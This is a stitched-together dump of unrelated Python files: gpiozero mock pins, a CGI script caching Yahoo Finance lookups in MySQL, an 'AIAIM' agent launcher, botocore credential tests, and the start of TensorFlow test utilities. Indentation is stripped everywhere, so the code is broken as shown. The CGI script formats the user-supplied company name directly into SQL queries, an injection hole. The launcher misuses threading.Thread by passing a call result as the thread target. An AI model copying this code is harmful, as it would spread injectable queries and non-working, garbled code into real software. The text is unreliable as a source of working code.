# whether we're meant to be acting on this edge
if self.clock_pin.state ^ self.clock_polarity ^ self.clock_phase:
self.rx_bit += 1
if self.mosi_pin is not None:
self.rx_buf.append(self.mosi_pin.state)
if self.miso_pin is not None:
try:
tx_value = self.tx_buf.pop(0)
except IndexError:
tx_value = 0
if tx_value:
self.miso_pin.drive_high()
else:
self.miso_pin.drive_low()
self.on_bit()
def on_start(self):
"""
Override this in descendents to detect when the mock SPI device's
select line is activated.
"""
self.rx_bit = 0
self.rx_buf = []
self.tx_buf = []
def on_bit(self):
"""
Override this in descendents to react to receiving a bit.
The :attr:`rx_bit` attribute gives the index of the bit received (this
is reset to 0 by default by :meth:`on_select`). The :attr:`rx_buf`
sequence gives the sequence of 1s and 0s that have been recevied so
far. The :attr:`tx_buf` sequence gives the sequence of 1s and 0s to
transmit on the next clock pulses. All these attributes can be modified
within this method.
The :meth:`rx_word` and :meth:`tx_word` methods can also be used to
read and append to the buffers using integers instead of bool bits.
"""
pass
def rx_word(self):
result = 0
bits = reversed(self.rx_buf) if self.lsb_first else self.rx_buf
for bit in bits:
result <<= 1
result |= bit
return result
def tx_word(self, value, bits_per_word=None):
if bits_per_word is None:
bits_per_word = self.bits_per_word
bits = [0] * bits_per_word
for bit in range(bits_per_word):
bits[bit] = value & 1
value >>= 1
assert not value
if not self.lsb_first:
bits = reversed(bits)
self.tx_buf.extend(bits)
class MockFactory(PiFactory):
"""
Factory for generating mock pins.
The *revision* parameter specifies what revision of Pi the mock factory
pretends to be (this affects the result of the :attr:`Factory.pi_info`
attribute as well as where pull-ups are assumed to be).
The *pin_class* attribute specifies which mock pin class will be generated
by the :meth:`pin` method by default. This can be changed after
construction by modifying the :attr:`pin_class` attribute.
.. attribute:: pin_class
This attribute stores the :class:`MockPin` class (or descendant) that
will be used when constructing pins with the :meth:`pin` method (if
no *pin_class* parameter is used to override it). It defaults on
construction to the value of the *pin_class* parameter in the
constructor, or :class:`MockPin` if that is unspecified.
"""
def __init__(self, revision=None, pin_class=None):
super().__init__()
if revision is None:
revision = os.environ.get('GPIOZERO_MOCK_REVISION', 'a02082')
if pin_class is None:
pin_class = os.environ.get('GPIOZERO_MOCK_PIN_CLASS', MockPin)
self._revision = int(revision, base=16)
if isinstance(pin_class, bytes):
pin_class = pin_class.decode('ascii')
if isinstance(pin_class, str):
dist = pkg_resources.get_distribution('gpiozero')
group = 'gpiozero_mock_pin_classes'
pin_class = pkg_resources.load_entry_point(
dist, group, pin_class.lower())
if not issubclass(pin_class, MockPin):
raise ValueError(
'invalid mock pin_class: {pin_class!r}'.format(
pin_class=pin_class))
self.pin_class = pin_class
def _get_revision(self):
return self._revision
def reset(self):
"""
Clears the pins and reservations sets. This is primarily useful in
test suites to ensure the pin factory is back in a "clean" state before
the next set of tests are run.
"""
self.pins.clear()
self._reservations.clear()
def pin(self, spec, pin_class=None, **kwargs):
"""
The pin method for :class:`MockFactory` additionally takes a
*pin_class* attribute which can be used to override the class'
:attr:`pin_class` attribute. Any additional keyword arguments will be
passed along to the pin constructor (useful with things like
:class:`MockConnectedPin` which expect to be constructed with another
pin).
"""
if pin_class is None:
pin_class = self.pin_class
n = self.pi_info.to_gpio(spec)
try:
pin = self.pins[n]
except KeyError:
pin = pin_class(self, n, **kwargs)
self.pins[n] = pin
else:
# Ensure the pin class expected supports PWM (or not)
if issubclass(pin_class, MockPWMPin) != isinstance(pin, MockPWMPin):
raise ValueError(
'pin {n} is already in use as a '
'{pin.__class__.__name__}'.format(n=n, pin=pin))
return pin
def _get_spi_class(self, shared, hardware):
return MockSPIInterfaceShared if shared else MockSPIInterface
@staticmethod
def ticks():
return monotonic()
@staticmethod
def ticks_diff(later, earlier):
return later - earlier
class MockSPIInterface(SPISoftware):
pass
class MockSPIInterfaceShared(SharedMixin, MockSPIInterface):
@classmethod
def _shared_key(cls, clock_pin, mosi_pin, miso_pin, select_pin,
pin_factory):
return (clock_pin, select_pin)
|
index.py
|
#!/usr/bin/pypy3
#!/usr/bin/python3
import cgi
import mysql.connector
from datetime import datetime, timedelta
from threading import Thread
from urllib.request import Request, urlopen
import json
def commit(company_name, results, cursor, cnx):
sql1 = "DELETE FROM yahoofinancessearch WHERE company_name='{}';".format(company_name)
sql2 = "INSERT INTO yahoofinancessearch VALUES('{}', '{}', '{}');".format(
company_name,
results,
str(datetime.now()))
cursor.execute(sql1)
cnx.commit()
cursor.execute(sql2)
cnx.commit()
cursor.close()
cnx.close()
def expected(dump):
return True
def site(company_name):
currencies = ['nzd', 'usd', 'eur', 'aud', 'sgd']
if company_name in currencies:
currencies.remove(company_name)
return json.dumps({'results':[company_name+'/'+c for c in currencies]})
elif len(company_name) == 7 and company_name[:3] in currencies and company_name[4:] in currencies:
return json.dumps({'results':[company_name[:3]+'/'+company_name[4:]]})
else:
url = 'https://nz.finance.yahoo.com/lookup?s={}'.format(company_name).replace(' ', '%20')
req = Request(url, headers={'User-Agent': 'Mozilla/5.0'})
webpage = urlopen(req).read()
html = webpage.decode('utf-8').replace('\r', '').replace('\n', '')
results = []
html = html[html.find('Symbols similar to'):]
index = html.find('data-symbol="')
while index != -1:
html = html[index+13:]
end = html.find('"')
results.append(html[:end])
index = html.find('data-symbol="')
output = []
for result in results:
if result not in output:
output.append(result)
return json.dumps({'results':output})
def main():
form = cgi.FieldStorage()
company_name = str(form['company_name'].value).lower().strip()
cnx = mysql.connector.connect(user='api', database='projectapi')
cursor = cnx.cursor(buffered=True)
sql = "SELECT * FROM yahoofinancessearch WHERE company_name='{}';".format(company_name)
cursor.execute(sql)
cache_results = ''
cache_expired = False
fetch_results = ''
results = ''
try:
data = list(cursor.fetchall()[0])
if (datetime.now()-timedelta(days=60)) > data[3]:
raise IndexError('item in database expired')
cache_results = data[2]
cursor.close()
cnx.close()
except:
cache_expired = True
fetch_results = site(company_name)
finally:
if not cache_expired:
results = cache_results
elif expected(fetch_results):
t1 = Thread(target=commit, args=(company_name, fetch_results, cursor, cnx,))
t1.start()
results = fetch_results
elif cache_expired:
results = cache_results
else:
results = json.dumps({'error':'api access problem'})
return results
if __name__ == '__main__':
print('Content-type:application/json', end='\r\n\r\n')
print(main().encode(encoding='UTF-8',errors='ignore').decode(), end='')
|
__main__.py
|
# main code for the agent
import sys
from utilz import utils_capture
import threading
from time import time, sleep
from agents import sis
from app import client
import os
import config
config = config.Config()
cwd = os.getcwd()
recording_folder = cwd+'/datasets/recording/'
test_folder = recording_folder+'/test/'
train_folder = recording_folder+'/train/'
model_folder = cwd+'/models/'
def record_session(duration, interval, mode, format):
app = client.Client()
t1 = threading.Thread(app.start(recording=True, mode=mode))
t1.start()
sc = utils_capture.InputRecord(recording_folder, config.capture_mode.get(mode)[0],config.capture_mode.get(mode)[1], interval=interval)
t2 = threading.Thread(target=sc.begin_recording())
t2.start()
sleep(duration)
sc.stop_recording(format)
app.stop()
return
def train_sis(mode):
#training
agent = sis.SIS(mode)
agent.build_sis()
return
def run():
app = client.Client()
app.start()
return
if __name__ == '__main__':
import argparse
# Parse command line arguments
parser = argparse.ArgumentParser(
description='Welcome to AIAIM, please enter a command.')
parser.add_argument("command",
metavar="<command>",
help="'help' 'record' 'train' or 'run'")
#Recording
parser.add_argument('--duration', required=False,
metavar="100",
help='Duration of the recording session in seconds')
parser.add_argument('--interval', required=False,
metavar=".200",
help="Interval between screen captures in seconds")
parser.add_argument('--mode', required=False,
metavar="lr",
help="The mode the images are captured as. 'wr' 'sr' or 'lr'")
parser.add_argument('--format', required=False,
metavar="png",
help="The format the images are saved as. 'h5' or 'png'")
#Training
parser.add_argument('--network', required=False,
metavar="vae",
help='The network you want to train')
parser.add_argument('--load_existing', required=False,
metavar="/path/to/existing/model.h5",
help='The path to the model you want to load.')
#Eval
parser.add_argument('--lol', required=False,
metavar="vae",
help='The network you want to evaluate')
args = parser.parse_args()
# Validate arguments
if args.command == "help":
print('Hi from AIAIM!\n T Please refer to the readme instructions for setup.\nGo to the Quickstart section to see how to train your first agent!')
elif args.command == "record":
assert args.duration, "Argument --duration is required for recording"
assert args.interval, "Argument --interval is required for recording"
assert args.mode, "Argument --mode is required for recording"
assert args.format, "Argument --format is required for recording"
record_session(int(args.duration), float(args.interval), args.mode, args.format)
elif args.command == "train":
assert args.network, "Argument --network is required for training"
elif args.command == "run":
run()
|
test_credentials.py
|
# Copyright 2015 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
import uuid
import threading
import os
import math
import time
import mock
import tempfile
import shutil
from datetime import datetime, timedelta
import sys
from dateutil.tz import tzlocal
from botocore.exceptions import CredentialRetrievalError
from tests import unittest, IntegerRefresher, BaseEnvVar, random_chars
from tests import temporary_file, StubbedSession
from botocore.credentials import EnvProvider, ContainerProvider
from botocore.credentials import InstanceMetadataProvider
from botocore.credentials import Credentials, ReadOnlyCredentials
from botocore.credentials import AssumeRoleProvider, ProfileProviderBuilder
from botocore.credentials import CanonicalNameCredentialSourcer
from botocore.credentials import DeferredRefreshableCredentials
from botocore.credentials import create_credential_resolver
from botocore.session import Session
from botocore.exceptions import InvalidConfigError, InfiniteLoopConfigError
from botocore.stub import Stubber
from botocore.awsrequest import AWSResponse
class TestCredentialRefreshRaces(unittest.TestCase):
def assert_consistent_credentials_seen(self, creds, func):
collected = []
self._run_threads(20, func, collected)
for creds in collected:
# During testing, the refresher uses it's current
# refresh count as the values for the access, secret, and
# token value. This means that at any given point in time,
# the credentials should be something like:
#
# ReadOnlyCredentials('1', '1', '1')
# ReadOnlyCredentials('2', '2', '2')
# ...
# ReadOnlyCredentials('30', '30', '30')
#
# This makes it really easy to verify we see a consistent
# set of credentials from the same time period. We just
# check if all the credential values are the same. If
# we ever see something like:
#
# ReadOnlyCredentials('1', '2', '1')
#
# We fail. This is because we're using the access_key
# from the first refresh ('1'), the secret key from
# the second refresh ('2'), and the token from the
# first refresh ('1').
self.assertTrue(creds[0] == creds[1] == creds[2], creds)
def assert_non_none_retrieved_credentials(self, func):
collected = []
self._run_threads(50, func, collected)
for cred in collected:
self.assertIsNotNone(cred)
def _run_threads(self, num_threads, func, collected):
threads = []
for _ in range(num_threads):
threads.append(threading.Thread(target=func, args=(collected,)))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
def test_has_no_race_conditions(self):
creds = IntegerRefresher(
creds_last_for=2,
advisory_refresh=1,
mandatory_refresh=0
)
def _run_in_thread(collected):
for _ in range(4000):
frozen = creds.get_frozen_credentials()
collected.append((frozen.access_key,
frozen.secret_key,
frozen.token))
start = time.time()
self.assert_consistent_credentials_seen(creds, _run_in_thread)
end = time.time()
# creds_last_for = 2 seconds (from above)
# So, for example, if execution time took 6.1 seconds, then
# we should see a maximum number of refreshes being (6 / 2.0) + 1 = 4
max_calls_allowed = math.ceil((end - start) / 2.0) + 1
self.assertTrue(creds.refresh_counter <= max_calls_allowed,
"Too many cred refreshes, max: %s, actual: %s, "
"time_delta: %.4f" % (max_calls_allowed,
creds.refresh_counter,
(end - start)))
def test_no_race_for_immediate_advisory_expiration(self):
creds = IntegerRefresher(
creds_last_for=1,
advisory_refresh=1,
mandatory_refresh=0
)
def _run_in_thread(collected):
for _ in range(100):
frozen = creds.get_frozen_credentials()
collected.append((frozen.access_key,
frozen.secret_key,
frozen.token))
self.assert_consistent_credentials_seen(creds, _run_in_thread)
def test_no_race_for_initial_refresh_of_deferred_refreshable(self):
def get_credentials():
expiry_time = (
datetime.now(tzlocal()) + timedelta(hours=24)).isoformat()
return {
'access_key': 'my-access-key',
'secret_key': 'my-secret-key',
'token': 'my-token',
'expiry_time': expiry_time
}
deferred_creds = DeferredRefreshableCredentials(
get_credentials, 'fixed')
def _run_in_thread(collected):
frozen = deferred_creds.get_frozen_credentials()
collected.append(frozen)
self.assert_non_none_retrieved_credentials(_run_in_thread)
class BaseAssumeRoleTest(BaseEnvVar):
def setUp(self):
super(BaseAssumeRoleTest, self).setUp()
self.tempdir = tempfile.mkdtemp()
self.config_file = os.path.join(self.tempdir, 'config')
self.environ['AWS_CONFIG_FILE'] = self.config_file
self.environ['AWS_SHARED_CREDENTIALS_FILE'] = str(uuid.uuid4())
def tearDown(self):
shutil.rmtree(self.tempdir)
super(BaseAssumeRoleTest, self).tearDown()
def some_future_time(self):
timeobj = datetime.now(tzlocal())
return timeobj + timedelta(hours=24)
def create_assume_role_response(self, credentials, expiration=None):
if expiration is None:
expiration = self.some_future_time()
response = {
'Credentials': {
'AccessKeyId': credentials.access_key,
'SecretAccessKey': credentials.secret_key,
'SessionToken': credentials.token,
'Expiration': expiration
},
'AssumedRoleUser': {
'AssumedRoleId': 'myroleid',
'Arn': 'arn:aws:iam::1234567890:user/myuser'
}
}
return response
def create_random_credentials(self):
return Credentials(
'fake-%s' % random_chars(15),
'fake-%s' % random_chars(35),
'fake-%s' % random_chars(45)
)
def assert_creds_equal(self, c1, c2):
c1_frozen = c1
if not isinstance(c1_frozen, ReadOnlyCredentials):
c1_frozen = c1.get_frozen_credentials()
c2_frozen = c2
if not isinstance(c2_frozen, ReadOnlyCredentials):
c2_frozen = c2.get_frozen_credentials()
self.assertEqual(c1_frozen, c2_frozen)
def write_config(self, config):
with open(self.config_file, 'w') as f:
f.write(config)
class TestAssumeRole(BaseAssumeRoleTest):
def setUp(self):
super(TestAssumeRole, self).setUp()
self.environ['AWS_ACCESS_KEY_ID'] = 'access_key'
self.environ['AWS_SECRET_ACCESS_KEY'] = 'secret_key'
self.metadata_provider = self.mock_provider(InstanceMetadataProvider)
self.env_provider = self.mock_provider(EnvProvider)
self.container_provider = self.mock_provider(ContainerProvider)
self.mock_client_creator = mock.Mock(spec=Session.create_client)
self.actual_client_region = None
current_dir = os.path.dirname(os.path.abspath(__file__))
credential_process = os.path.join(
current_dir, 'utils', 'credentialprocess.py'
)
self.credential_process = '%s %s' % (
sys.executable, credential_process
)
def mock_provider(self, provider_cls):
mock_instance = mock.Mock(spec=provider_cls)
mock_instance.load.return_value = None
mock_instance.METHOD = provider_cls.METHOD
mock_instance.CANONICAL_NAME = provider_cls.CANONICAL_NAME
return mock_instance
def create_session(self, profile=None):
session = StubbedSession(profile=profile)
# We have to set bogus credentials here or otherwise we'll trigger
# an early credential chain resolution.
sts = session.create_client(
'sts',
aws_access_key_id='spam',
aws_secret_access_key='eggs',
)
self.mock_client_creator.return_value = sts
assume_role_provider = AssumeRoleProvider(
load_config=lambda: session.full_config,
client_creator=self.mock_client_creator,
cache={},
profile_name=profile,
credential_sourcer=CanonicalNameCredentialSourcer([
self.env_provider, self.container_provider,
self.metadata_provider
]),
profile_provider_builder=ProfileProviderBuilder(session),
)
stubber = session.stub('sts')
stubber.activate()
component_name = 'credential_provider'
resolver = session.get_component(component_name)
available_methods = [p.METHOD for p in resolver.providers]
replacements = {
'env': self.env_provider,
'iam-role': self.metadata_provider,
'container-role': self.container_provider,
'assume-role': assume_role_provider
}
for name, provider in replacements.items():
try:
index = available_methods.index(name)
except ValueError:
# The provider isn't in the session
continue
resolver.providers[index] = provider
session.register_component(
'credential_provider', resolver
)
return session, stubber
def test_assume_role(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'source_profile = B\n\n'
'[profile B]\n'
'aws_access_key_id = abc123\n'
'aws_secret_access_key = def456\n'
)
self.write_config(config)
expected_creds = self.create_random_credentials()
response = self.create_assume_role_response(expected_creds)
session, stubber = self.create_session(profile='A')
stubber.add_response('assume_role', response)
actual_creds = session.get_credentials()
self.assert_creds_equal(actual_creds, expected_creds)
stubber.assert_no_pending_responses()
def test_environment_credential_source(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'credential_source = Environment\n'
)
self.write_config(config)
environment_creds = self.create_random_credentials()
self.env_provider.load.return_value = environment_creds
expected_creds = self.create_random_credentials()
response = self.create_assume_role_response(expected_creds)
session, stubber = self.create_session(profile='A')
stubber.add_response('assume_role', response)
actual_creds = session.get_credentials()
self.assert_creds_equal(actual_creds, expected_creds)
stubber.assert_no_pending_responses()
self.assertEqual(self.env_provider.load.call_count, 1)
def test_instance_metadata_credential_source(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'credential_source = Ec2InstanceMetadata\n'
)
self.write_config(config)
metadata_creds = self.create_random_credentials()
self.metadata_provider.load.return_value = metadata_creds
expected_creds = self.create_random_credentials()
response = self.create_assume_role_response(expected_creds)
session, stubber = self.create_session(profile='A')
stubber.add_response('assume_role', response)
actual_creds = session.get_credentials()
self.assert_creds_equal(actual_creds, expected_creds)
stubber.assert_no_pending_responses()
self.assertEqual(self.metadata_provider.load.call_count, 1)
def test_container_credential_source(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'credential_source = EcsContainer\n'
)
self.write_config(config)
container_creds = self.create_random_credentials()
self.container_provider.load.return_value = container_creds
expected_creds = self.create_random_credentials()
response = self.create_assume_role_response(expected_creds)
session, stubber = self.create_session(profile='A')
stubber.add_response('assume_role', response)
actual_creds = session.get_credentials()
self.assert_creds_equal(actual_creds, expected_creds)
stubber.assert_no_pending_responses()
self.assertEqual(self.container_provider.load.call_count, 1)
def test_invalid_credential_source(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'credential_source = CustomInvalidProvider\n'
)
self.write_config(config)
with self.assertRaises(InvalidConfigError):
session, _ = self.create_session(profile='A')
session.get_credentials()
def test_misconfigured_source_profile(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'source_profile = B\n'
'[profile B]\n'
'region = us-west-2\n'
)
self.write_config(config)
with self.assertRaises(InvalidConfigError):
session, _ = self.create_session(profile='A')
session.get_credentials().get_frozen_credentials()
def test_recursive_assume_role(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'source_profile = B\n\n'
'[profile B]\n'
'role_arn = arn:aws:iam::123456789:role/RoleB\n'
'source_profile = C\n\n'
'[profile C]\n'
'aws_access_key_id = abc123\n'
'aws_secret_access_key = def456\n'
)
self.write_config(config)
profile_b_creds = self.create_random_credentials()
profile_b_response = self.create_assume_role_response(profile_b_creds)
profile_a_creds = self.create_random_credentials()
profile_a_response = self.create_assume_role_response(profile_a_creds)
session, stubber = self.create_session(profile='A')
stubber.add_response('assume_role', profile_b_response)
stubber.add_response('assume_role', profile_a_response)
actual_creds = session.get_credentials()
self.assert_creds_equal(actual_creds, profile_a_creds)
stubber.assert_no_pending_responses()
def test_recursive_assume_role_stops_at_static_creds(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'source_profile = B\n\n'
'[profile B]\n'
'aws_access_key_id = abc123\n'
'aws_secret_access_key = def456\n'
'role_arn = arn:aws:iam::123456789:role/RoleB\n'
'source_profile = C\n\n'
'[profile C]\n'
'aws_access_key_id = abc123\n'
'aws_secret_access_key = def456\n'
)
self.write_config(config)
profile_a_creds = self.create_random_credentials()
profile_a_response = self.create_assume_role_response(profile_a_creds)
session, stubber = self.create_session(profile='A')
stubber.add_response('assume_role', profile_a_response)
actual_creds = session.get_credentials()
self.assert_creds_equal(actual_creds, profile_a_creds)
stubber.assert_no_pending_responses()
def test_infinitely_recursive_assume_role(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'source_profile = A\n'
)
self.write_config(config)
with self.assertRaises(InfiniteLoopConfigError):
session, _ = self.create_session(profile='A')
session.get_credentials()
def test_process_source_profile(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'source_profile = B\n'
'[profile B]\n'
'credential_process = %s\n' % self.credential_process
)
self.write_config(config)
expected_creds = self.create_random_credentials()
response = self.create_assume_role_response(expected_creds)
session, stubber = self.create_session(profile='A')
stubber.add_response('assume_role', response)
actual_creds = session.get_credentials()
self.assert_creds_equal(actual_creds, expected_creds)
stubber.assert_no_pending_responses()
# Assert that the client was created with the credentials from the
# credential process.
self.assertEqual(self.mock_client_creator.call_count, 1)
_, kwargs = self.mock_client_creator.call_args_list[0]
expected_kwargs = {
'aws_access_key_id': 'spam',
'aws_secret_access_key': 'eggs',
'aws_session_token': None,
}
self.assertEqual(kwargs, expected_kwargs)
def test_web_identity_source_profile(self):
token_path = os.path.join(self.tempdir, 'token')
with open(token_path, 'w') as token_file:
token_file.write('a.token')
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'source_profile = B\n'
'[profile B]\n'
'role_arn = arn:aws:iam::123456789:role/RoleB\n'
'web_identity_token_file = %s\n' % token_path
)
self.write_config(config)
session, stubber = self.create_session(profile='A')
identity_creds = self.create_random_credentials()
identity_response = self.create_assume_role_response(identity_creds)
stubber.add_response(
'assume_role_with_web_identity',
identity_response,
)
expected_creds = self.create_random_credentials()
assume_role_response = self.create_assume_role_response(expected_creds)
stubber.add_response('assume_role', assume_role_response)
actual_creds = session.get_credentials()
self.assert_creds_equal(actual_creds, expected_creds)
stubber.assert_no_pending_responses()
# Assert that the client was created with the credentials from the
# assume role with web identity call.
self.assertEqual(self.mock_client_creator.call_count, 1)
_, kwargs = self.mock_client_creator.call_args_list[0]
expected_kwargs = {
'aws_access_key_id': identity_creds.access_key,
'aws_secret_access_key': identity_creds.secret_key,
'aws_session_token': identity_creds.token,
}
self.assertEqual(kwargs, expected_kwargs)
def test_web_identity_source_profile_ignores_env_vars(self):
token_path = os.path.join(self.tempdir, 'token')
with open(token_path, 'w') as token_file:
token_file.write('a.token')
self.environ['AWS_ROLE_ARN'] = 'arn:aws:iam::123456789:role/RoleB'
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'source_profile = B\n'
'[profile B]\n'
'web_identity_token_file = %s\n' % token_path
)
self.write_config(config)
session, _ = self.create_session(profile='A')
# The config is split between the profile and the env, we
# should only be looking at the profile so this should raise
# a configuration error.
with self.assertRaises(InvalidConfigError):
session.get_credentials()
def test_web_identity_credential_source_ignores_env_vars(self):
token_path = os.path.join(self.tempdir, 'token')
with open(token_path, 'w') as token_file:
token_file.write('a.token')
self.environ['AWS_ROLE_ARN'] = 'arn:aws:iam::123456789:role/RoleB'
self.environ['AWS_WEB_IDENTITY_TOKEN_FILE'] = token_path
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'credential_source = Environment\n'
)
self.write_config(config)
session, _ = self.create_session(profile='A')
# We should not get credentials from web-identity configured in the
# environment when the Environment credential_source is set.
# There are no Environment credentials, so this should raise a
# retrieval error.
with self.assertRaises(CredentialRetrievalError):
session.get_credentials()
def test_self_referential_profile(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'source_profile = A\n'
'aws_access_key_id = abc123\n'
'aws_secret_access_key = def456\n'
)
self.write_config(config)
expected_creds = self.create_random_credentials()
response = self.create_assume_role_response(expected_creds)
session, stubber = self.create_session(profile='A')
stubber.add_response('assume_role', response)
actual_creds = session.get_credentials()
self.assert_creds_equal(actual_creds, expected_creds)
stubber.assert_no_pending_responses()
def create_stubbed_sts_client(self, session):
expected_creds = self.create_random_credentials()
_original_create_client = session.create_client
def create_client_sts_stub(service, *args, **kwargs):
client = _original_create_client(service, *args, **kwargs)
stub = Stubber(client)
response = self.create_assume_role_response(expected_creds)
self.actual_client_region = client.meta.region_name
stub.add_response('assume_role', response)
stub.activate()
return client
return create_client_sts_stub, expected_creds
def test_assume_role_uses_correct_region(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'source_profile = B\n\n'
'[profile B]\n'
'aws_access_key_id = abc123\n'
'aws_secret_access_key = def456\n'
)
self.write_config(config)
session = Session(profile='A')
# Verify that when we configure the session with a specific region
# that we use that region when creating the sts client.
session.set_config_variable('region', 'cn-north-1')
create_client, expected_creds = self.create_stubbed_sts_client(session)
session.create_client = create_client
resolver = create_credential_resolver(session)
provider = resolver.get_provider('assume-role')
creds = provider.load()
self.assert_creds_equal(creds, expected_creds)
self.assertEqual(self.actual_client_region, 'cn-north-1')
class TestAssumeRoleWithWebIdentity(BaseAssumeRoleTest):
def setUp(self):
super(TestAssumeRoleWithWebIdentity, self).setUp()
self.token_file = os.path.join(self.tempdir, 'token.jwt')
self.write_token('totally.a.token')
def write_token(self, token, path=None):
if path is None:
path = self.token_file
with open(path, 'w') as f:
f.write(token)
def assert_session_credentials(self, expected_params, **kwargs):
expected_creds = self.create_random_credentials()
response = self.create_assume_role_response(expected_creds)
session = StubbedSession(**kwargs)
stubber = session.stub('sts')
stubber.add_response(
'assume_role_with_web_identity',
response,
expected_params
)
stubber.activate()
actual_creds = session.get_credentials()
self.assert_creds_equal(actual_creds, expected_creds)
stubber.assert_no_pending_responses()
def test_assume_role(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'role_session_name = sname\n'
'web_identity_token_file = %s\n'
) % self.token_file
self.write_config(config)
expected_params = {
'RoleArn': 'arn:aws:iam::123456789:role/RoleA',
'RoleSessionName': 'sname',
'WebIdentityToken': 'totally.a.token',
}
self.assert_session_credentials(expected_params, profile='A')
def test_assume_role_env_vars(self):
config = (
'[profile B]\n'
'region = us-west-2\n'
)
self.write_config(config)
self.environ['AWS_ROLE_ARN'] = 'arn:aws:iam::123456789:role/RoleB'
self.environ['AWS_WEB_IDENTITY_TOKEN_FILE'] = self.token_file
self.environ['AWS_ROLE_SESSION_NAME'] = 'bname'
expected_params = {
'RoleArn': 'arn:aws:iam::123456789:role/RoleB',
'RoleSessionName': 'bname',
'WebIdentityToken': 'totally.a.token',
}
self.assert_session_credentials(expected_params)
def test_assume_role_env_vars_do_not_take_precedence(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'role_session_name = aname\n'
'web_identity_token_file = %s\n'
) % self.token_file
self.write_config(config)
different_token = os.path.join(self.tempdir, str(uuid.uuid4()))
self.write_token('totally.different.token', path=different_token)
self.environ['AWS_ROLE_ARN'] = 'arn:aws:iam::123456789:role/RoleC'
self.environ['AWS_WEB_IDENTITY_TOKEN_FILE'] = different_token
self.environ['AWS_ROLE_SESSION_NAME'] = 'cname'
expected_params = {
'RoleArn': 'arn:aws:iam::123456789:role/RoleA',
'RoleSessionName': 'aname',
'WebIdentityToken': 'totally.a.token',
}
self.assert_session_credentials(expected_params, profile='A')
class TestProcessProvider(unittest.TestCase):
def setUp(self):
current_dir = os.path.dirname(os.path.abspath(__file__))
credential_process = os.path.join(
current_dir, 'utils', 'credentialprocess.py'
)
self.credential_process = '%s %s' % (
sys.executable, credential_process
)
self.environ = os.environ.copy()
self.environ_patch = mock.patch('os.environ', self.environ)
self.environ_patch.start()
def tearDown(self):
self.environ_patch.stop()
def test_credential_process(self):
config = (
'[profile processcreds]\n'
'credential_process = %s\n'
)
config = config % self.credential_process
with temporary_file('w') as f:
f.write(config)
f.flush()
self.environ['AWS_CONFIG_FILE'] = f.name
credentials = Session(profile='processcreds').get_credentials()
self.assertEqual(credentials.access_key, 'spam')
self.assertEqual(credentials.secret_key, 'eggs')
def test_credential_process_returns_error(self):
config = (
'[profile processcreds]\n'
'credential_process = %s --raise-error\n'
)
config = config % self.credential_process
with temporary_file('w') as f:
f.write(config)
f.flush()
self.environ['AWS_CONFIG_FILE'] = f.name
session = Session(profile='processcreds')
# This regex validates that there is no substring: b'
# The reason why we want to validate that is that we want to
# make sure that stderr is actually decoded so that in
# exceptional cases the error is properly formatted.
# As for how the regex works:
# `(?!b').` is a negative lookahead, meaning that it will only
# match if it is not followed by the pattern `b'`. Since it is
# followed by a `.` it will match any character not followed by
# that pattern. `((?!hede).)*` does that zero or more times. The
# final pattern adds `^` and `$` to anchor the beginning and end
# of the string so we can know the whole string is consumed.
# Finally `(?s)` at the beginning makes dots match newlines so
# we can handle a multi-line string.
reg = r"(?s)^((?!b').)*$"
with self.assertRaisesRegexp(CredentialRetrievalError, reg):
session.get_credentials()
|
test_util.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=invalid-name
"""Test utils for tensorflow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import gc
import math
import random
import re
import tempfile
import threading
import numpy as np
import six
_portpicker_import_error = None
try:
import portpicker # pylint: disable=g-import-not-at-top
except ImportError as _error:
_portpicker_import_error = _error
portpicker = None
# pylint: disable=g-import-not-at-top
from google.protobuf import descriptor_pool
from google.protobuf import text_format
from tensorflow.core.framework import graph_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python import pywrap_tensorflow
from tensorflow.python.client import device_lib
from tensorflow.python.client import session
from tensorflow.python.eager import backprop
from tensorflow.python.eager import context
from tensorflow.python.eager import tape # pylint: disable=unused-import
from tensorflow.python.framework import device as pydev
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import importer
